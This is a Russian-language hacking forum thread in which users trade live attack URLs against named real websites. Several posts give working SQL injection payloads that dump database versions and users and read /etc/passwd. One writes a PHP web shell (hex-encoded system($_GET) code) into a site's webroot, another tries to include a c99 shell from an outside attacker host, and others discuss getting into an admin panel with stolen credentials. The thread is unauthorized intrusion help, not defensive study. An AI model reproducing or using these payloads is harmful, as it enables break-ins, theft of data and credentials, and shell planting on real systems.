Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    49
    Likes Received:
    7
    Reputations:
    0
    Дальше сам ;)
    PHP:
    http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version(),3,4,5--
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    PHP:
    http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),database(),user()),30,31,32,33,34,35,36,37,38,39/*
    ...
     
    _________________________
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    вот есть саyт..

    версия 4.1.18..есть mysql.user и file_priv Y..

    хочу заливать шелл..

    читаю /etc/passwd
    http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+


    а потом '/'
    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+

    а здесь видно папка

    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+

    и потом здеlaю так..

    http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*

    http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?

    и не получается

    обшем поjaлуста помоqите заливат шелл
     
  4. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    285
    Likes Received:
    48
    Reputations:
    29
    чё то я не могу понять а вывод, то есть команды?
    вот чё то я пеопробовал и файло у меня не перечиталось
     
  5. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    LokbatanLi!как то ты по извращенному льешь шелл


    Вот! http://www.georgica.net/temp/1.php?id=ls

    вывод в файл работает!
    http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E223B6563686F2073797374656D28245F4745545B226964225D293B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+FROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+

    все норм
     
    #11885 Rubaka, 18 Mar 2010
    Last edited: 18 Mar 2010
    1 person likes this.
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    Rubaka
    a qde shell ??

    http://www.georgica.net/temp/1.php?id=http://azattacker.org/forum/c99.txt?
     
  7. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!!
    а не инклюдишь!
    тама код system($_GET["id"]); прописан!

    и ты могешь мля не писать транслитом!!!!!!!!!!!
     
    #11887 Rubaka, 18 Mar 2010
    Last edited: 18 Mar 2010
  8. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    net ne kak ne moqu ponyat izvini..
     
    1 person likes this.
  9. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    65
    Likes Received:
    4
    Reputations:
    3
    Подскажите плиз. http://met-con.com/images/?w=700&src=/images/properties/dump%20oct%2019%202009%20110.jpg

    там есть читалка?
     
  10. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    скуля есть
    PHP:
    http://met-con.com/mdc/index.php?page=-1+union+select+1,concat(version(),0x40,database(),0x40,user()),3,4,5--+
    5.0.89-community@metcon_web@metcon_webuser@localhost
     
    _________________________
    1 person likes this.
  11. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Скажите, если у меня есть логин и пароль админа сайта, как залогинится под ним?
    На сайте нет возможности ввести логин, пасс. Слышал, что можно залить шелл, или это не то?
    У кого есть ссылка на какую-то статью на эту тему напишите.
     
  12. scorpic393

    scorpic393 Banned

    Joined:
    5 Feb 2010
    Messages:
    65
    Likes Received:
    4
    Reputations:
    3
    да я знаю.но мне она нах не нужна, т.к. там .htpasswd auth
     
  13. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23
    Шелл пока немного не то. Хотя смотря каким макаром ты достал логин и пасс.
    Попробуй поискать админку. www.site.ru/admin
    или другие варианты мб adm.php ну вобщем дофига. Если нет то пиши лс и адресок сайта мб помогу.
     
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Это знаю, пробивал - нет.
    А почему шелл - не то? Дайте у кого есть инфу на эту тему.
     
  15. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23
    Дак думаю про mysql.user и file priv = Y и ковычки ты знаешь тут объяснять не надо. Ты способ скажи каким ты пароли достал скули и мб СИ ? А в админку мб вход только с определенных IP ?
     
  16. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    21
    Likes Received:
    3
    Reputations:
    0
    http://extensis.cnrc.navy.mil/index.htm?content=http://google.com

    Помогите довести до ума [​IMG]
     
  17. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Админку достал из БД. В таблице юзеров был и админ. Так как это реализовать?
     
  18. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23
    Бд слита или есть доступ к phpmyadmin?
     
  19. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    177
    Likes Received:
    102
    Reputations:
    23

    Обычный фрейм.
     
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    659
    Likes Received:
    117
    Reputations:
    37
    Я просто прочитал бд и увидел там ники и пароли юзеров. Доступа к пхпадмин - нет.
     
Loading...
Thread Status:
Not open for further replies.